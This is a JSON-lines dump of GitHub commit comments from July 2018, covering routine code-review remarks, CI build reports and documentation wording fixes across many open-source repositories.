{"id":"7944278091","type":"CommitCommentEvent","actor":{"login":"artoh"},"repo":{"name":"petriaarnio/kitupiikki"},"payload":{"comment":{"id":29657787,"position":null,"line":null,"path":null,"commit_id":"985b9eca91b194382138ed284e6220b4e0ac6adb","created_at":"2018-07-10T14:40:59Z","updated_at":"2018-07-10T14:40:59Z","author_association":"NONE","body":"Moikka!\r\nKiva, että olet parantanut koodin laatua ja virheitäkin olet löytänyt!\r\n\r\nLaittaisitko pull requestin Kitupiikin masteriin, niin saadaan sinun tekemät korjaukset (ja mac-haara) oikeilla tekijätiedoilla hyödynnetyksi, kun Release Canditaten julkaisu lähestyy.\r\n\r\nMasteriin on tänään lisätty uusi linux&windows-käännösautomaatioskripti (mxe-ristiinkäännöksellä) ja siihen liittyen popplerin #includet on muutettu ilman #if-lauseita toimiviksi - minusta olisi siisteintä, jos includepolkuja ei toistettaisi jokaisessa tiedostossa.\r\n\r\nLuuletko, että olisi mahdollista saada heinäkuussa mac-versio jakeluun? Tarkoitus on saada RC ulos heinäkuussa ja elokuussa viimein 1.0 final.\r\n\r\nArtoH"}},"created_at":"2018-07-10T14:40:59Z"}
{"id":"7944280133","type":"CommitCommentEvent","actor":{"login":"flavius"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29657792,"position":null,"line":null,"path":null,"commit_id":"50c2d27271565804e1920507fa6fdebb0e4ee855","created_at":"2018-07-10T14:41:16Z","updated_at":"2018-07-10T14:41:16Z","author_association":"NONE","body":"Commit message is bad. It indicates that two things were done: \"adding more rules and fixing #1\". A commit should do only one thing. What constitutes \"one thing\" can be subjective, it's a matter of sizing the chunks of work, etc, but in this case it's clearly two completely different things in one commit.\r\n\r\nYou could have used\r\n\r\n`git commit --allow-empty -m \"fix #1\"`\r\n\r\nfor example."}},"created_at":"2018-07-10T14:41:16Z"}
{"id":"7944281130","type":"CommitCommentEvent","actor":{"login":"enumag"},"repo":{"name":"07th-mod/Higurashi_Installer_WPF"},"payload":{"comment":{"id":29657798,"position":5,"line":31,"path":"Higurashi_Installer_WPF/MainWindow.xaml.cs","commit_id":"6cab85f060cb76c0496cbcec61c271071188a8cd","created_at":"2018-07-10T14:41:25Z","updated_at":"2018-07-10T14:41:25Z","author_association":"MEMBER","body":"looks like you should check your IDE settings ;-)"}},"created_at":"2018-07-10T14:41:25Z"}
{"id":"7944291363","type":"CommitCommentEvent","actor":{"login":"artem-fedorov"},"repo":{"name":"jenkinsci/performance-plugin"},"payload":{"comment":{"id":29657820,"position":null,"line":null,"path":null,"commit_id":"9b38268c10c1642c753e7a9a2b3216e4336db496","created_at":"2018-07-10T14:42:53Z","updated_at":"2018-07-10T14:42:53Z","author_association":"COLLABORATOR","body":"Nothing more\r\nNow you can install this `performance.hpi` in your Jenkins\r\n```\r\nNavigate to the Manage Jenkins > Manage Plugins page in the web UI.\r\nClick on the Advanced tab.\r\nChoose the .hpi file under the Upload Plugin section.\r\nUpload the plugin file.\r\n```\r\n"}},"created_at":"2018-07-10T14:42:53Z"}
{"id":"7944292499","type":"CommitCommentEvent","actor":{"login":"alepauly"},"repo":{"name":"alepauly/vsts-dotnet-samples"},"payload":{"comment":{"id":29657824,"position":15,"line":16,"path":"ClientLibrary/Snippets/Microsoft.TeamServices.Samples.Client/Git/RefsSample.cs","commit_id":"4744ea900d0bd1004c75506e897babe4b68db94b","created_at":"2018-07-10T14:43:03Z","updated_at":"2018-07-10T14:43:03Z","author_association":"OWNER","body":"The only reason I hesitate on this is because the biggest use case for this code are readers trying to learn how to use the API and encapsulating things like this could actually make it a bit harder to understand. I'll leave it as is for now since it's all over the place anyway."}},"created_at":"2018-07-10T14:43:03Z"}
{"id":"7944293094","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29657826,"position":null,"line":null,"path":null,"commit_id":"65ae8137653804235794a9acfb5854d999333a9e","created_at":"2018-07-10T14:43:09Z","updated_at":"2018-07-10T14:43:09Z","author_association":"NONE","body":"So I can assume this fixes STK issue"}},"created_at":"2018-07-10T14:43:09Z"}
{"id":"7944298323","type":"CommitCommentEvent","actor":{"login":"MusikAnimal"},"repo":{"name":"WPAFC/afch-rewrite"},"payload":{"comment":{"id":29657837,"position":null,"line":null,"path":null,"commit_id":"2a8780369d41c3886afdad1d226edc320f75e6ef","created_at":"2018-07-10T14:43:53Z","updated_at":"2018-07-10T14:43:53Z","author_association":"NONE","body":"I made a typo, sorry. See the fix at https://en.wikipedia.org/w/index.php?diff=849609510"}},"created_at":"2018-07-10T14:43:53Z"}
{"id":"7944301904","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29657843,"position":null,"line":null,"path":null,"commit_id":"2600f0a40611325b41791228843db184a5c2e012","created_at":"2018-07-10T14:44:24Z","updated_at":"2018-07-10T14:44:24Z","author_association":"COLLABORATOR","body":"Can an issue be made for this instead? I don't think this sentence really belongs in an SRS since it's not directly related to the examples it's a part of... @szymczdm "}},"created_at":"2018-07-10T14:44:24Z"}
{"id":"7944303594","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29657845,"position":null,"line":null,"path":null,"commit_id":"65ae8137653804235794a9acfb5854d999333a9e","created_at":"2018-07-10T14:44:39Z","updated_at":"2018-07-10T14:44:39Z","author_association":"OWNER","body":"Unfortunately no."}},"created_at":"2018-07-10T14:44:39Z"}
{"id":"7944305464","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29657849,"position":22,"line":21,"path":"src/main/java/com/agurova/controllers/ImageController.java","commit_id":"e714fddf8ec48bdc302536321f8b0adcac1a27b1","created_at":"2018-07-10T14:44:57Z","updated_at":"2018-07-10T14:44:57Z","author_association":"COLLABORATOR","body":"Для констант в джаве есть свои правила наименования."}},"created_at":"2018-07-10T14:44:57Z"}
{"id":"7944311507","type":"CommitCommentEvent","actor":{"login":"pozdnyakov"},"repo":{"name":"nagineni/mapbox-gl-native"},"payload":{"comment":{"id":29657862,"position":5,"line":36,"path":"include/mbgl/style/expression/compound_expression.hpp","commit_id":"03bc89668fbc2d30c86199e4e2109fc9df6f0094","created_at":"2018-07-10T14:45:49Z","updated_at":"2018-07-10T14:45:49Z","author_association":"NONE","body":"maybe `using Varargs = std::vector` ?"}},"created_at":"2018-07-10T14:45:49Z"}
{"id":"7944313435","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29657867,"position":null,"line":null,"path":null,"commit_id":"65ae8137653804235794a9acfb5854d999333a9e","created_at":"2018-07-10T14:46:07Z","updated_at":"2018-07-10T14:46:07Z","author_association":"NONE","body":"It's still hang after choosing stk option?\r\n\r\nDid you notice that it sends a long command to modem in radio logcat?"}},"created_at":"2018-07-10T14:46:07Z"}
{"id":"7944317536","type":"CommitCommentEvent","actor":{"login":"AlexHaxe"},"repo":{"name":"HaxeCheckstyle/tokentree-formatter"},"payload":{"comment":{"id":29657876,"position":38,"line":14,"path":"src/tokentreeformatter/config/WhitespaceConfig.hx","commit_id":"a178209528bf826425cca3e574c84622219302db","created_at":"2018-07-10T14:46:41Z","updated_at":"2018-07-10T14:46:41Z","author_association":"MEMBER","body":"yeah, that's a bit ugly, but it won't compile otherwise\r\nI mean it's nice, that you can have a default value for each field, but for enum abstracts it's tedious. I guess it has to do with macros.\r\nI haven't tried to use ` from String` which might allow a `String` as default value..."}},"created_at":"2018-07-10T14:46:41Z"}
{"id":"7944318278","type":"CommitCommentEvent","actor":{"login":"pozdnyakov"},"repo":{"name":"nagineni/mapbox-gl-native"},"payload":{"comment":{"id":29657878,"position":17,"line":40,"path":"src/mbgl/tile/geometry_tile_data.hpp","commit_id":"03bc89668fbc2d30c86199e4e2109fc9df6f0094","created_at":"2018-07-10T14:46:48Z","updated_at":"2018-07-10T14:46:48Z","author_association":"NONE","body":"=  default"}},"created_at":"2018-07-10T14:46:48Z"}
{"id":"7944319255","type":"CommitCommentEvent","actor":{"login":"pozdnyakov"},"repo":{"name":"nagineni/mapbox-gl-native"},"payload":{"comment":{"id":29657881,"position":18,"line":41,"path":"src/mbgl/tile/geometry_tile_data.hpp","commit_id":"03bc89668fbc2d30c86199e4e2109fc9df6f0094","created_at":"2018-07-10T14:46:57Z","updated_at":"2018-07-10T14:46:57Z","author_association":"NONE","body":"=  default"}},"created_at":"2018-07-10T14:46:57Z"}
{"id":"7944319468","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29657884,"position":24,"line":24,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T14:46:58Z","updated_at":"2018-07-10T14:46:58Z","author_association":"CONTRIBUTOR","body":"`Agent` should always be capitalized"}},"created_at":"2018-07-10T14:46:58Z"}
{"id":"7944321066","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29657889,"position":23,"line":22,"path":"src/main/java/com/agurova/controllers/ImageController.java","commit_id":"e714fddf8ec48bdc302536321f8b0adcac1a27b1","created_at":"2018-07-10T14:47:13Z","updated_at":"2018-07-10T14:47:13Z","author_association":"COLLABORATOR","body":"Не нужен модификаор static."}},"created_at":"2018-07-10T14:47:13Z"}
{"id":"7944322789","type":"CommitCommentEvent","actor":{"login":"FakelsHub"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29657896,"position":30,"line":50,"path":"artifacts/mods/gl_partycontrol.ssl","commit_id":"08b5e3a7694159336b9bba2ddb975baac3dca0f6","created_at":"2018-07-10T14:47:28Z","updated_at":"2018-07-10T14:47:28Z","author_association":"CONTRIBUTOR","body":"this is not necessary, move_to will do the centering itself."}},"created_at":"2018-07-10T14:47:28Z"}
{"id":"7944333075","type":"CommitCommentEvent","actor":{"login":"fbricon"},"repo":{"name":"NikolasKomonen/vscode-xml"},"payload":{"comment":{"id":29657917,"position":18,"line":18,"path":"Jenkinsfile","commit_id":"9153f181422c43f4b631e5167b04e2d1f5f4d7d6","created_at":"2018-07-10T14:48:57Z","updated_at":"2018-07-10T14:48:57Z","author_association":"NONE","body":"sh \"./mvnw clean verify -B -U -e\"\r\n\r\ndon't need to fail at the end (-fae)"}},"created_at":"2018-07-10T14:48:57Z"}
{"id":"7944333301","type":"CommitCommentEvent","actor":{"login":"artoh"},"repo":{"name":"artoh/kitupiikki"},"payload":{"comment":{"id":29657918,"position":null,"line":null,"path":null,"commit_id":"df3ced41cb141c65ef5be77a5275181118e86626","created_at":"2018-07-10T14:48:59Z","updated_at":"2018-07-10T14:48:59Z","author_association":"OWNER","body":"Tässä on virhe, eli koska yleensä mitään Muotoa ei ole tässä vaiheessa valittu, ei mitään muotoa näy\r\n![image](https://user-images.githubusercontent.com/1282146/42517868-63566a5e-8469-11e8-9df5-4d67afc02ab8.png)\r\n\r\nPitäisi olla lista yritysmuodoista\r\n![image](https://user-images.githubusercontent.com/1282146/42517895-7a7d2006-8469-11e8-8d80-b1c6f46de889.png)\r\n"}},"created_at":"2018-07-10T14:48:59Z"}
{"id":"7944334436","type":"CommitCommentEvent","actor":{"login":"fbricon"},"repo":{"name":"NikolasKomonen/vscode-xml"},"payload":{"comment":{"id":29657923,"position":27,"line":27,"path":"Jenkinsfile","commit_id":"9153f181422c43f4b631e5167b04e2d1f5f4d7d6","created_at":"2018-07-10T14:49:09Z","updated_at":"2018-07-10T14:49:09Z","author_association":"NONE","body":"use proper git url"}},"created_at":"2018-07-10T14:49:09Z"}
{"id":"7944335530","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29657926,"position":null,"line":null,"path":null,"commit_id":"9d0b981289e6dca90608ae28787e262a490547ad","created_at":"2018-07-10T14:49:18Z","updated_at":"2018-07-10T14:49:18Z","author_association":"NONE","body":"157643005-ddress-limitations-and-overshooting-problem-using-ZTM1 (lgu1234) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-10T14:49:18Z"}
{"id":"7944336020","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29657930,"position":null,"line":null,"path":null,"commit_id":"65ae8137653804235794a9acfb5854d999333a9e","created_at":"2018-07-10T14:49:22Z","updated_at":"2018-07-10T14:49:22Z","author_association":"OWNER","body":"I will track this here https://github.com/ngoquang2708/android_device_samsung_vivalto3gvn/issues/106.\r\n\r\nMy STK didn't even start."}},"created_at":"2018-07-10T14:49:22Z"}
{"id":"7944336209","type":"CommitCommentEvent","actor":{"login":"NickKaramoff"},"repo":{"name":"project-six/it-museum"},"payload":{"comment":{"id":29657932,"position":null,"line":null,"path":null,"commit_id":"88d98fb0e36466466db063194848714f4708022a","created_at":"2018-07-10T14:49:23Z","updated_at":"2018-07-10T14:49:23Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Локализировать названия полей в админке](https://trello.com/c/khtD4end/41-%D0%BB%D0%BE%D0%BA%D0%B0%D0%BB%D0%B8%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0%D0%B7%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F-%D0%BF%D0%BE%D0%BB%D0%B5%D0%B9-%D0%B2-%D0%B0%D0%B4%D0%BC%D0%B8%D0%BD%D0%BA%D0%B5)"}},"created_at":"2018-07-10T14:49:23Z"}
{"id":"7944336610","type":"CommitCommentEvent","actor":{"login":"davelandry"},"repo":{"name":"d3plus/d3plus-axis"},"payload":{"comment":{"id":29657934,"position":null,"line":null,"path":null,"commit_id":"f643b9692ceafe5f2fa18a62d14ed91be1201b83","created_at":"2018-07-10T14:49:27Z","updated_at":"2018-07-10T14:49:27Z","author_association":"MEMBER","body":"@cnavarreteliz check it out. Inside of `Axis.js`, when calculating the buffer, we were incorrectly using the index of the last item in the domain to modify the range at the index."}},"created_at":"2018-07-10T14:49:27Z"}
{"id":"7944338218","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeCheckstyle/tokentree-formatter"},"payload":{"comment":{"id":29657937,"position":38,"line":14,"path":"src/tokentreeformatter/config/WhitespaceConfig.hx","commit_id":"a178209528bf826425cca3e574c84622219302db","created_at":"2018-07-10T14:49:42Z","updated_at":"2018-07-10T14:49:42Z","author_association":"MEMBER","body":"Perhaps worth opening an issue on the json2object repo. It should be able to fully qualify the enum value based on the field's type..."}},"created_at":"2018-07-10T14:49:42Z"}
{"id":"7944340211","type":"CommitCommentEvent","actor":{"login":"fbricon"},"repo":{"name":"NikolasKomonen/vscode-xml"},"payload":{"comment":{"id":29657945,"position":37,"line":37,"path":"Jenkinsfile","commit_id":"9153f181422c43f4b631e5167b04e2d1f5f4d7d6","created_at":"2018-07-10T14:50:00Z","updated_at":"2018-07-10T14:50:00Z","author_association":"NONE","body":"no need to untar the server, it's not a tar.gz. just copy the jar in ./server"}},"created_at":"2018-07-10T14:50:00Z"}
{"id":"7944343429","type":"CommitCommentEvent","actor":{"login":"gopal09054"},"repo":{"name":"gopal09054/FakeXRMNew"},"payload":{"comment":{"id":29657952,"position":null,"line":null,"path":null,"commit_id":"a1cf9a0ec45f048f566dc2df1a926843775d7878","created_at":"2018-07-10T14:50:27Z","updated_at":"2018-07-10T14:50:27Z","author_association":"OWNER","body":"Code Added For Operator NextXWeeks"}},"created_at":"2018-07-10T14:50:27Z"}
{"id":"7944344181","type":"CommitCommentEvent","actor":{"login":"fbricon"},"repo":{"name":"NikolasKomonen/vscode-xml"},"payload":{"comment":{"id":29657955,"position":50,"line":50,"path":"Jenkinsfile","commit_id":"9153f181422c43f4b631e5167b04e2d1f5f4d7d6","created_at":"2018-07-10T14:50:33Z","updated_at":"2018-07-10T14:50:33Z","author_association":"NONE","body":"${UPLOAD_LOCATION}/vscode-xml/staging"}},"created_at":"2018-07-10T14:50:33Z"}
{"id":"7944346299","type":"CommitCommentEvent","actor":{"login":"PVLam"},"repo":{"name":"PVLam/Chua-de-2-C-10-07-2018"},"payload":{"comment":{"id":29657961,"position":null,"line":null,"path":null,"commit_id":"9eb84715b58dc2fadde17eee3f5756eab9afc073","created_at":"2018-07-10T14:50:52Z","updated_at":"2018-07-10T14:50:52Z","author_association":"OWNER","body":"Fixed"}},"created_at":"2018-07-10T14:50:52Z"}
{"id":"7944349062","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/compliance-checker-feedstock"},"payload":{"comment":{"id":29657965,"position":null,"line":null,"path":null,"commit_id":"a7f44cf13b32fae394f65af5126a6477da28bf8a","created_at":"2018-07-10T14:51:16Z","updated_at":"2018-07-10T14:51:16Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @benjwadams, @lukecampbell were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @benjwadams, @lukecampbell were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-10T14:51:16Z"}
{"id":"7944352377","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29657971,"position":32,"line":32,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T14:51:45Z","updated_at":"2018-07-10T14:51:45Z","author_association":"CONTRIBUTOR","body":"Since Metadata is plural, it should be `Metadata consist (...)`"}},"created_at":"2018-07-10T14:51:45Z"}
{"id":"7944355057","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29657978,"position":40,"line":40,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T14:52:10Z","updated_at":"2018-07-10T14:52:10Z","author_association":"CONTRIBUTOR","body":"Data is plural: `APM data consist`"}},"created_at":"2018-07-10T14:52:10Z"}
{"id":"7944355258","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29657979,"position":null,"line":null,"path":null,"commit_id":"2600f0a40611325b41791228843db184a5c2e012","created_at":"2018-07-10T14:52:11Z","updated_at":"2018-07-10T14:52:11Z","author_association":"COLLABORATOR","body":"I agree with @niazim3.  This sentence is more about Drasil than it is about the SRS.  I would be fine with removing this note from the SRS and adding an issue to Drasil for a future enhancement."}},"created_at":"2018-07-10T14:52:11Z"}
{"id":"7944360657","type":"CommitCommentEvent","actor":{"login":"fbricon"},"repo":{"name":"NikolasKomonen/vscode-xml"},"payload":{"comment":{"id":29657992,"position":62,"line":62,"path":"Jenkinsfile","commit_id":"9153f181422c43f4b631e5167b04e2d1f5f4d7d6","created_at":"2018-07-10T14:53:00Z","updated_at":"2018-07-10T14:53:00Z","author_association":"COLLABORATOR","body":"vscode_xml_marketplace"}},"created_at":"2018-07-10T14:53:00Z"}
{"id":"7944361128","type":"CommitCommentEvent","actor":{"login":"isaachier"},"repo":{"name":"sustrik/libmill"},"payload":{"comment":{"id":29657993,"position":null,"line":null,"path":null,"commit_id":"61322eaf794db1941b4ee1bc64836e3378ca06f0","created_at":"2018-07-10T14:53:05Z","updated_at":"2018-07-10T14:53:05Z","author_association":"CONTRIBUTOR","body":"About the use of `CMAKE_INSTALL_LIBDIR`, the problem is that it seems to be an absolute path. That means if I build using a temporary directory for the installation, then I move the installation elsewhere, the package breaks. These are referred to as non-relocatable builds."}},"created_at":"2018-07-10T14:53:05Z"}
{"id":"7944362997","type":"CommitCommentEvent","actor":{"login":"sledorze"},"repo":{"name":"gcanti/fp-ts"},"payload":{"comment":{"id":29657997,"position":8,"line":485,"path":"src/Array.ts","commit_id":"3d6f6f72cc6d7e7bc8c058e0d70cd4a1883ae1e8","created_at":"2018-07-10T14:53:22Z","updated_at":"2018-07-10T14:53:22Z","author_association":"COLLABORATOR","body":"@gcanti yes it's really an update of the unification.\r\n\r\nI agree we should wait for 3.0, however if its the final/intended behaviour I would argue we should really consider fixing that in fp-ts as it rejects a lot of valid code.\r\n\r\nThe fix of keeping the correct type is to add a type annotation a usage site which is really annoying and can create unwanted coercition.\r\n"}},"created_at":"2018-07-10T14:53:22Z"}
{"id":"7944363080","type":"CommitCommentEvent","actor":{"login":"fbricon"},"repo":{"name":"NikolasKomonen/vscode-xml"},"payload":{"comment":{"id":29657998,"position":68,"line":68,"path":"Jenkinsfile","commit_id":"9153f181422c43f4b631e5167b04e2d1f5f4d7d6","created_at":"2018-07-10T14:53:23Z","updated_at":"2018-07-10T14:53:23Z","author_association":"COLLABORATOR","body":" \"Publish to http://download.jboss.org/jbosstools/static/vscode-xml/stable/\""}},"created_at":"2018-07-10T14:53:23Z"}
{"id":"7944363513","type":"CommitCommentEvent","actor":{"login":"boniato"},"repo":{"name":"boniato/GCP-study"},"payload":{"comment":{"id":29657999,"position":null,"line":null,"path":null,"commit_id":"2815db5cb1858016e2871ef9fd3eb5d5b9fd24f6","created_at":"2018-07-10T14:53:27Z","updated_at":"2018-07-10T14:53:27Z","author_association":"OWNER","body":" This sentence is extracted from https://www.coursera.org"}},"created_at":"2018-07-10T14:53:27Z"}
{"id":"7944365744","type":"CommitCommentEvent","actor":{"login":"fbricon"},"repo":{"name":"NikolasKomonen/vscode-xml"},"payload":{"comment":{"id":29658001,"position":71,"line":71,"path":"Jenkinsfile","commit_id":"9153f181422c43f4b631e5167b04e2d1f5f4d7d6","created_at":"2018-07-10T14:53:45Z","updated_at":"2018-07-10T14:53:45Z","author_association":"COLLABORATOR","body":"${UPLOAD_LOCATION}/static/vscode-xml/stable/"}},"created_at":"2018-07-10T14:53:45Z"}
{"id":"7944374655","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"IharVypau/or-2"},"payload":{"comment":{"id":29658015,"position":4,"line":4,"path":"tenLesson/script.js","commit_id":"4f79022a15cdaa9aca9c68d7d8263e2b96e89f5f","created_at":"2018-07-10T14:55:06Z","updated_at":"2018-07-10T14:55:06Z","author_association":"NONE","body":"а если вот так? `checkingComb('naMe is Alex','name') `"}},"created_at":"2018-07-10T14:55:06Z"}
{"id":"7944376930","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658019,"position":40,"line":40,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T14:55:25Z","updated_at":"2018-07-10T14:55:25Z","author_association":"CONTRIBUTOR","body":"For the `Customers can leverage certain agent features`, I think we should avoid `can` since it's to vague and instead use `must` or `should` as defined in the [RFC 2119](https://www.ietf.org/rfc/rfc2119.txt)"}},"created_at":"2018-07-10T14:55:25Z"}
{"id":"7944378012","type":"CommitCommentEvent","actor":{"login":"benmccann"},"repo":{"name":"jtablesaw/tablesaw"},"payload":{"comment":{"id":29658022,"position":5,"line":15,"path":"pom.xml","commit_id":"2207d598858c891a41bbbacfefaceabab75e6511","created_at":"2018-07-10T14:55:35Z","updated_at":"2018-07-10T14:55:35Z","author_association":"COLLABORATOR","body":"Did you cut a release? I'm not seeing it on Maven Search yet, but it could just be a delay. Usually it takes an hour. But I don't see a release tagged on GitHub\r\n\r\n[According to SO, when we're developing the next version we should have `tag` set to `HEAD`](https://stackoverflow.com/questions/23718601/what-is-the-usage-of-maven-pom-xml-tag-element-inside-of-scm-when-you-are). Then when we want to cut a release we can run `mvn release:prepare` followed by `mvn release:perform` and it will update the `tag` accordingly for us\r\n"}},"created_at":"2018-07-10T14:55:35Z"}
{"id":"7944382028","type":"CommitCommentEvent","actor":{"login":"imgios"},"repo":{"name":"lucaam/focus.it"},"payload":{"comment":{"id":29658032,"position":null,"line":null,"path":null,"commit_id":"c0c533d0cb429dc7804c6c90aa2d82e5ae7ef858","created_at":"2018-07-10T14:56:11Z","updated_at":"2018-07-10T14:56:11Z","author_association":"NONE","body":"Prego Luke"}},"created_at":"2018-07-10T14:56:11Z"}
{"id":"7944383822","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658039,"position":44,"line":44,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T14:56:27Z","updated_at":"2018-07-10T14:56:27Z","author_association":"CONTRIBUTOR","body":"Same comment on the `Customers can`"}},"created_at":"2018-07-10T14:56:27Z"}
{"id":"7944389452","type":"CommitCommentEvent","actor":{"login":"FakelsHub"},"repo":{"name":"phobos2077/sfall"},"payload":{"comment":{"id":29658058,"position":30,"line":50,"path":"artifacts/mods/gl_partycontrol.ssl","commit_id":"08b5e3a7694159336b9bba2ddb975baac3dca0f6","created_at":"2018-07-10T14:57:18Z","updated_at":"2018-07-10T14:57:18Z","author_association":"CONTRIBUTOR","body":"If you want the screen to be centered and for the player, I would separate the functions, since I do not need to remove the roof tiles for the player, and would simply apply the function separately to the player\r\n`metarule3(METARULE3_TILE_SET_CENTER, dude_tile,dude_elevation,0)`"}},"created_at":"2018-07-10T14:57:18Z"}
{"id":"7944392686","type":"CommitCommentEvent","actor":{"login":"liangfengchao"},"repo":{"name":"liangfengchao/qqmusic"},"payload":{"comment":{"id":29658072,"position":null,"line":null,"path":null,"commit_id":"cc8a95a49df056601d53506983e81cab1a0225a9","created_at":"2018-07-10T14:57:47Z","updated_at":"2018-07-10T14:57:47Z","author_association":"OWNER","body":"aa"}},"created_at":"2018-07-10T14:57:47Z"}
{"id":"7944395312","type":"CommitCommentEvent","actor":{"login":"mtremsal"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658084,"position":22,"line":22,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T14:58:10Z","updated_at":"2018-07-10T14:58:10Z","author_association":"NONE","body":"The series is located at `/security/`. Should there be a different way to link these pages together?"}},"created_at":"2018-07-10T14:58:10Z"}
{"id":"7944399780","type":"CommitCommentEvent","actor":{"login":"tyrasd"},"repo":{"name":"osmlab/editor-layer-index"},"payload":{"comment":{"id":29658097,"position":null,"line":null,"path":null,"commit_id":"380df00dfb00848050037021c9d7c354d473a97e","created_at":"2018-07-10T14:58:50Z","updated_at":"2018-07-10T14:58:50Z","author_association":"MEMBER","body":"This is the difference: https://gist.github.com/tyrasd/176b585c95c737f594f9f53b96d3a03a – it's mostly mountainous/forested area along the border between South Tyrol and Trentino and a few small villages in rural Trentino. I actually thought the difference would be smaller, and I do see now that the layer might actually be useful when editing along the border there. I'll update the geometry of the 2014 layer to have only the difference, though."}},"created_at":"2018-07-10T14:58:50Z"}
{"id":"7944399872","type":"CommitCommentEvent","actor":{"login":"VonLatvala"},"repo":{"name":"jenkinsci/performance-plugin"},"payload":{"comment":{"id":29658099,"position":null,"line":null,"path":null,"commit_id":"9b38268c10c1642c753e7a9a2b3216e4336db496","created_at":"2018-07-10T14:58:51Z","updated_at":"2018-07-10T14:58:51Z","author_association":"NONE","body":"Thank you, but I do not actually need the binary for anything, since I'm building Ansible configurations for Jenkins.\r\n\r\nHave a nice day!"}},"created_at":"2018-07-10T14:58:51Z"}
{"id":"7944399907","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29658100,"position":null,"line":null,"path":null,"commit_id":"9d0b981289e6dca90608ae28787e262a490547ad","created_at":"2018-07-10T14:58:51Z","updated_at":"2018-07-10T14:58:51Z","author_association":"NONE","body":"157643005-ddress-limitations-and-overshooting-problem-using-ZTM1 (lgu1234) - x86_64-MacOS-10.9-clang: OK (2931 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9d0b981289e6dca90608ae28787e262a490547ad-x86_64-MacOS-10.9-clang.html'>![Test 